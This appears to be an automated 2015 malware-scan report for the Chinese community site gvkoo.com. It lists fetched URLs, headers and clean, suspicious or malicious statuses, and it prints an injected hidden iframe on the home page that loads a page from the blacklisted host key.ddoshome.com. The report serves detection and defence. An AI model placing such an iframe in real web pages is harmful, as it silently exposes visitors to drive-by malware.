Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gvkoo.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.gvkoo.com/ | HTTP/1.1 200 OK Date: Sat, 07 Mar 2015 07:55:17 GMT Accept-Ranges: bytes ETag: "50ae6883fe54d01:1999" Server: Microsoft-IIS/6.0 Content-Length: 96292 Content-Location: http://www.gvkoo.com/index.html Content-Type: text/html Last-Modified: Mon, 02 Mar 2015 15:35:29 GMT X-Powered-By: ASP.NET | clean |
http://www.gvkoo.com/index.html | 200 OK Content-Length: 96292 Content-Type: text/html | malicious |
Page code contains blacklisted domain: key.ddoshome.com <iframe src=http://key.ddoshome.com:21999/index.htm width=123 height=1></iframe><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gbk" /> <title>谷客生活网,谷客,谷客生活,谷客征婚,谷客交友,谷客分类信息,谷客社区,谷客论坛,谷客官网,谷客生 ...[4250 bytes skipped]... Malicious iFrame found. size: 123x1 src: http://key.ddoshome.com:21999/index.htm This URL is marked by Google as suspicious <iframe src=http://key.ddoshome.com:21999/index.htm width=123 height=1> | ||
http://www.gvkoo.com/data/cache/common.js?WP9 | 200 OK Content-Length: 56144 Content-Type: application/x-javascript | clean |
http://www.gvkoo.com/data/cache/portal.js?WP9 | 200 OK Content-Length: 9945 Content-Type: application/x-javascript | clean |
http://www.gvkoo.com/data/cache/logging.js?WP9 | 200 OK Content-Length: 390 Content-Type: application/x-javascript | clean |
http://www.gvkoo.com/home.php?mod=misc&ac=sendmail&rand=1425277060 | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://www.gvkoo.com/data/cache/html2dynamic.js?WP9 | 200 OK Content-Length: 2215 Content-Type: application/x-javascript | clean |
http://discuz.gtimg.cn/cloud/scripts/discuz_tips.js?v=1 | 200 OK Content-Length: 6173 Content-Type: application/x-javascript | clean |
http://www.gvkoo.com/member.php?mod=register | 200 OK Content-Length: 5792 Content-Type: text/html | clean |
http://www.gvkoo.com/data/cache/common.js?S0u | 200 OK Content-Length: 56144 Content-Type: application/x-javascript | clean |
http://www.gvkoo.com/data/cache/logging.js?S0u | 200 OK Content-Length: 390 Content-Type: application/x-javascript | clean |
http://www.gvkoo.com/./ | HTTP/1.1 200 OK Date: Sat, 07 Mar 2015 07:55:44 GMT Accept-Ranges: bytes ETag: "50ae6883fe54d01:1999" Server: Microsoft-IIS/6.0 Content-Length: 96292 Content-Location: http://www.gvkoo.com/index.html Content-Type: text/html Last-Modified: Mon, 02 Mar 2015 15:35:29 GMT X-Powered-By: ASP.NET | clean |
http://www.gvkoo.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.gvkoo.com/connect.php?mod=login&op=init&referer=http%3A%2F%2Fwww.gvkoo.com%2F.%2F&statfrom=login_simple | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 07 Mar 2015 07:55:47 GMT Location: https://graph.qq.com/oauth2.0/authorize?response_type=code&client_id=310676843&redirect_uri=http%3A%2F%2Fwww.gvkoo.com%2Fconnect.php%3Fmod%3Dlogin%26op%3Dcallback%26referer%3Dhttp%253A%252F%252Fwww.gvkoo.com%252F.%252F&state=abc9033295293f1cd21b52e174992054&scope=get_user_info%2Cadd_share%2Cadd_t%2Cadd_pic_t%2Cget_repost_list Server: Microsoft-IIS/6.0 Content-Type: text/html; charset=gbk Set-Cookie: NYrF_2132_saltkey=Cp4UPs6T; expires=Mon, 06-Apr-2015 07:55:47 GMT; path=/; httponly Set-Cookie: NYrF_2132_lastvisit=1425711347; expires=Mon, 06-Apr-2015 07:55:47 GMT; path=/ Set-Cookie: NYrF_2132_sid=w3CBlt; expires=Sun, 08-Mar-2015 07:55:47 GMT; path=/ Set-Cookie: NYrF_2132_lastact=1425714947%09connect.php%09login; expires=Sun, 08-Mar-2015 07:55:47 GMT; path=/ Set-Cookie: NYrF_2132_con_request_uri=http%3A%2F%2Fwww.gvkoo.com%2Fconnect.php%3Fmod%3Dlogin%26op%3Dcallback%26referer%3Dhttp%253A%252F%252Fwww.gvkoo.com%252F.%252F; path=/ X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.17 | clean |
https://graph.qq.com/oauth2.0/authorize?response_type=code&client_id=310676843&redirect_uri=http%3a%2f%2fwww.gvkoo.com%2fconnect.php%3fmod%3dlogin%26op%3dcallback%26referer%3dhttp%253a%252f%252fwww.gvkoo.com%252f.%252f&state=abc9033295293f1cd21b52e174992054&scope=get_user_info%2cadd_share%2cadd_t%2cadd_pic_t%2cget_repost_list | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 07 Mar 2015 07:55:55 GMT Location: http://openapi.qzone.qq.com/oauth/show?which=Login&display=pc&response_type=code&client_id=310676843&redirect_uri=http%3a%2f%2fwww.gvkoo.com%2fconnect.php%3fmod%3dlogin%26op%3dcallback%26referer%3dhttp%253a%252f%252fwww.gvkoo.com%252f.%252f&state=abc9033295293f1cd21b52e174992054&scope=get_user_info%2cadd_share%2cadd_t%2cadd_pic_t%2cget_repost_list Server: tws Content-Length: 0 Content-Type: text/html | clean |
http://openapi.qzone.qq.com/oauth/show?which=login&display=pc&response_type=code&client_id=310676843&redirect_uri=http%3a%2f%2fwww.gvkoo.com%2fconnect.php%3fmod%3dlogin%26op%3dcallback%26referer%3dhttp%253a%252f%252fwww.gvkoo.com%252f.%252f&state=abc9033295293f1cd21b52e174992054&scope=get_user_info%2cadd_share%2cadd_t%2cadd_pic_t%2cget_repost_list | 200 OK Content-Length: 7473 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.gvkoo.com ...[1851 bytes skipped]... r.userAgent].join("|_|")); var src = 'http://badjs.qq.com/cgi-bin/js_report?'+ [bid,mid,msg].join("&"); errorTransport = new Image; errorTransport.onerror = errorTransport.onload = function(){ errorTransport = errorTransport.onerror = errorTransport.onload = null ; }; errorTransport.src = src; false; Q.crtDomain = 'http://www.gvkoo.com/'; Q.agree = function(){ window.isAgreed = true; }; Q.logout = function(){ window.isLogouted = true; }; Q.isNeedLogin = true; Q.getParameter = function getParameter(name) { var r = new RegExp("(\\?|#|&)" + name + "=([^&#]*)(&|#|$)"), m = location.href.match(r); return decodeURIComponent(!m ? "" : m[2]); }; Q.ptlogin2 = function(){ ...[1780 bytes skipped]... | ||
http://qzonestyle.gtimg.cn/c/=/open/connect/widget/pc/login/pt_adapt.js,qlogin_v2.js?v=20140527 | 200 OK Content-Length: 24403 Content-Type: application/x-javascript | clean |
http://www.gvkoo.com/forum.php?gid=1 | 200 OK Content-Length: 51722 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: fenlei.gvkoo.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gbk" /> <title>谷客城市生活论坛,谷客生活网</title> <meta name="keywords" content="城市生活论坛,谷客生活网" /> <meta name="description" content= ...[4312 bytes skipped]... | ||
http://www.gvkoo.com/data/cache/forum.js?S0u | 200 OK Content-Length: 19423 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gvkoo.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: gvkoo.com
Referer: http://www.google.com/search?q=gvkoo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.